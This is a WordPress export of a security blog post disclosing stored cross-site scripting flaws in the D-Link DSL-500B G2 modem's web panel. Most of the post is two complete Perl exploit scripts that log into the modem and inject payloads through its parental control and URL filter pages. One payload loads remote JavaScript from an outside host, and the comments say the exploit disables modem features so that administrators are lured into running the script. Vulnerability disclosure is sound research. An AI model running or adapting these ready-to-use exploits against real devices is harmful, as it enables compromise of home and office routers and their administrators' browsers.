{"id":386,"date":"2016-10-11T10:37:12","date_gmt":"2016-10-11T13:37:12","guid":{"rendered":"http:\/\/www.xlabs.com.br\/blog\/?p=386"},"modified":"2021-08-25T17:52:34","modified_gmt":"2021-08-25T20:52:34","slug":"cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored","status":"publish","type":"post","link":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/","title":{"rendered":"Modem D-Link DSL-500B GII XSS Injection Stored"},"content":{"rendered":"\n<p>While analyzing the security of the D-Link DSL-500B Generation 2 modem, we found several Cross-Site Scripting vulnerabilities, also known as XSS Injection. All of the flaws allow the modem to store malicious code, which can give rise to an external attack on the victim's network; in this case the most common victim would be the modem's administrator. This short article aims to present the exploit code for these flaws.<\/p>\n\n\n\n<h4><strong>Platform description according to the manufacturer's website<\/strong><\/h4>\n\n\n\n<p>The DSL-500B G2, D-Link's ADSL2+ broadband modem, is ideal for users who get their Internet connection over the telephone line. This router connects directly to the telephone line, with no need for a separate ADSL modem. Because it is also a router, the DSL-500B G2 connects a group of users to the Internet, allowing computers in a home or office to share a high-speed ADSL 2\/2+ connection. It provides Ethernet connectivity for computers and devices. 
It has four Ethernet ports, firewall protection and QoS for efficient and secure downloads or uploads of photos, music files, videos and e-mail over the Internet.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/04\/Tela_inicial.jpg\"><img decoding=\"async\" width=\"463\" height=\"390\" src=\"http:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/04\/Tela_inicial.jpg\" alt=\"\" class=\"wp-image-388\" srcset=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/04\/Tela_inicial.jpg 463w, https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/04\/Tela_inicial-300x253.jpg 300w\" sizes=\"(max-width: 463px) 100vw, 463px\" \/><\/a><\/figure>\n\n\n\n<h4><strong>The security flaw<\/strong><\/h4>\n\n\n\n<p># Software: D-Link DSL-500B Generation 2<br># Version: BCM 1.1<br># Company: D-Link<br># Website: www.dlink.com<br># Vulnerability: Multiple Stored Cross-Site Scripting (XSS Injection Stored)<br># CVE: CVE-2015-XXXX<br># Author: Mauricio Corr\u00eaa<br># POC: <a href=\"https:\/\/www.youtube.com\/watch?v=Fc_JuZ-uHE4\" target=\"_blank\" rel=\"noopener noreferrer\">Video<\/a><\/p>\n\n\n\n<p><strong>todmngr.tod exploit (Parental Control Configuration Panel)<\/strong><\/p>\n\n\n\n<pre 
class=\"wp-block-preformatted lang:perl decode:true\">#!\/usr\/bin\/perl\n#\n# Date dd-mm-yyyy: 13-02-2015\n# Exploit for D-Link DSL-500B G2\n# Cross Site Scripting (XSS Injection) Stored in todmngr.tod\n# Developed by Mauricio Corr\u00eaa\n# XLabs Information Security\n# WebSite: www.xlabs.com.br\n#\n# CAUTION!\n# This exploit disables some features of the modem,\n# forcing the administrator of the device to access the page and reconfigure the modem,\n# at which point the script executes in the browser of internal network users.\n#\n# Use with caution!\n# Use at your own risk!\n#\n\nuse strict;\nuse warnings;\nuse diagnostics;\nuse LWP::UserAgent;\nuse HTTP::Request;\nuse URI::Escape;\n\n\tmy $ip = $ARGV[0];\n\n\tmy $user = $ARGV[1];\n\n\tmy $pass = $ARGV[2];\n\t\t\n\n\t\tif (@ARGV != 3){\n\n\t\t\tprint \"\\n\";\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in todmngr.tod\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"Usage: perl $0 http:\\\/\\\/host_ip\\\/ user pass\\n\";\n\n\t\t}else{\n\n\t\t\t$ip = $1 if($ip=~\/(.*)\\\/$\/);\n\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in todmngr.tod\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"[+] Exploring $ip\\\/ ...\\n\";\n\n\t\t\tmy $payload = \"%3Cscript%3Ealert%28%27XLabs%27%29%3C%2fscript%3E\";\n\t\t\t\n\t\t\tmy $ua = new LWP::UserAgent;\n\n\t\t\tmy $hdrs = new HTTP::Headers( Accept =&gt; 'text\/plain', UserAgent =&gt; \"XLabs Security Exploit Browser\/1.0\" );\n\n\t\t\t$hdrs-&gt;authorization_basic($user, $pass);\n\t\t\t\n\t\t\tchomp($ip);\n\n\t\t\t\n\t\t\tprint \"[+] Preparing exploit...\\n\";\n\t\t\t\n\t\t\tmy $url_and_xpl = 
\"$ip\/todmngr.tod?action=add&amp;username=$payload&amp;mac=AA:BB:CC:DD:EE:FF&amp;days=1&amp;start_time=720&amp;end_time=840\";\n\t\t\t\t\t\t\n\t\t\tmy $req = new HTTP::Request(\"GET\",$url_and_xpl,$hdrs);\n\n\t\t\tprint \"[+] Prepared!\\n\";\n\t\t\t\n\t\t\tprint \"[+] Requesting and Exploiting...\\n\";\n\t\t\t\n\t\t\tmy $resp = $ua-&gt;request($req);\n\n\t\t\tif ($resp-&gt;is_success){\n\n\t\t\tprint \"[+] Successfully Requested!\\n\";\n\t\t\t\n\t\t\t\n\t\t\t\tmy $url = \"$ip\/todmngr.tod?action=view\";\n\t\t\t\n\t\t\t\t$req = new HTTP::Request(\"GET\",$url,$hdrs);\n\n\t\t\t\tprint \"[+] Checking that was explored...\\n\";\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tmy $resp2 = $ua-&gt;request($req);\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tif ($resp2-&gt;is_success){\n\n\t\t\t\tmy $resultado = $resp2-&gt;as_string;\n\t\t\t\t\n\t\t\t\t\t\t\tif(index($resultado, uri_unescape($payload)) != -1){\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tprint \"[+] Successfully Exploited!\";\n\n\t\t\t\t\t\t\t}else{\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tprint \"[-] Not Exploited!\";\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t}else {\n\n\t\t\tprint \"[-] Ops!\\n\";\n\t\t\tprint $resp-&gt;message;\n\n\t\t\t}\n\n\n}\n\n<\/pre>\n\n\n\n<p>Exploit for the URL Filter configuration:<\/p>\n\n\n\n<p><strong>URL Filter exploit (URL Filter Configuration Panel)<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted lang:perl decode:true\">#!\/usr\/bin\/perl\n#\n# Date dd-mm-yyyy: 13-02-2015\n# Exploit for D-Link DSL-500B G2\n# Cross Site Scripting (XSS Injection) Stored in todmngr.tod URL Filter\n# Developed by Mauricio Corr\u00eaa\n# XLabs Information Security\n# WebSite: www.xlabs.com.br\n#\n# CAUTION!\n# This exploit disables some features of the modem,\n# forcing the administrator of the device to access the page and reconfigure the modem,\n# at which point the script executes in the browser of internal network users.\n#\n# Use with caution!\n# Use at your own risk!\n#\n\nuse strict;\nuse warnings;\nuse diagnostics;\nuse 
LWP::UserAgent;\nuse HTTP::Request;\nuse URI::Escape;\n\n\tmy $ip = $ARGV[0];\n\n\tmy $user = $ARGV[1];\n\n\tmy $pass = $ARGV[2];\n\t\t\n\n\t\tif (@ARGV != 3){\n\n\t\t\tprint \"\\n\";\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in URL Filter\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"Usage: perl $0 http:\\\/\\\/host_ip\\\/ user pass\\n\";\n\n\t\t}else{\n\n\t\t\t$ip = $1 if($ip=~\/(.*)\\\/$\/);\n\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in URL Filter\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"[+] Exploring $ip\\\/ ...\\n\";\n\n\t\t\tmy $payload = \"%3Cscript%20src%3D%27%2f%2fxlabs.com.br%2fxssi.js%27%3E%3C%2fscript%3E\";\n\t\t\t\n\t\t\tmy $ua = new LWP::UserAgent;\n\n\t\t\tmy $hdrs = new HTTP::Headers( Accept =&gt; 'text\/plain', UserAgent =&gt; \"XLabs Security Exploit Browser\/1.0\" );\n\n\t\t\t$hdrs-&gt;authorization_basic($user, $pass);\n\t\t\t\n\t\t\tchomp($ip);\n\n\t\t\t\n\t\t\tprint \"[+] Preparing exploit...\\n\";\n\t\t\t\n\t\t\tmy $url_and_xpl = \"$ip\/todmngr.tod?action=set_url&amp;TodUrlAdd=GameOver$payload&amp;port_num=1234\";\n\t\t\t\t\t\t\n\t\t\tmy $req = new HTTP::Request(\"GET\",$url_and_xpl,$hdrs);\n\n\t\t\tprint \"[+] Prepared!\\n\";\n\t\t\t\n\t\t\tprint \"[+] Requesting and Exploiting...\\n\";\n\t\t\t\n\t\t\tmy $resp = $ua-&gt;request($req);\n\n\t\t\tif ($resp-&gt;is_success){\n\n\t\t\tprint \"[+] Successfully Requested!\\n\";\n\t\t\t\n\t\t\t\n\t\t\t\tmy $url = \"$ip\/todmngr.tod?action=urlview\";\n\t\t\t\n\t\t\t\t$req = new HTTP::Request(\"GET\",$url,$hdrs);\n\n\t\t\t\tprint \"[+] Checking that was explored...\\n\";\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tmy $resp2 = 
$ua-&gt;request($req);\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tif ($resp2-&gt;is_success){\n\n\t\t\t\tmy $resultado = $resp2-&gt;as_string;\n\t\t\t\t\n\t\t\t\t\t\t\tif(index($resultado, uri_unescape($payload)) != -1){\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tprint \"[+] Successfully Exploited!\";\n\n\t\t\t\t\t\t\t}else{\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tprint \"[-] Not Exploited!\";\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t}else {\n\n\t\t\t\tprint \"[-] Ops!\\n\";\n\t\t\t\tprint $resp-&gt;message;\n\n\t\t\t}\n\n\n}\n\n<\/pre>\n","protected":false},"author":1,"featured_media":1624,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[61],"tags":[42,88,92,91,41]}